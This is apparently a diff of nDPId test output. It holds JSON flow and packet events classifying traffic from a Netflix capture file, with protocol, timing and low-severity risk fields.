+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 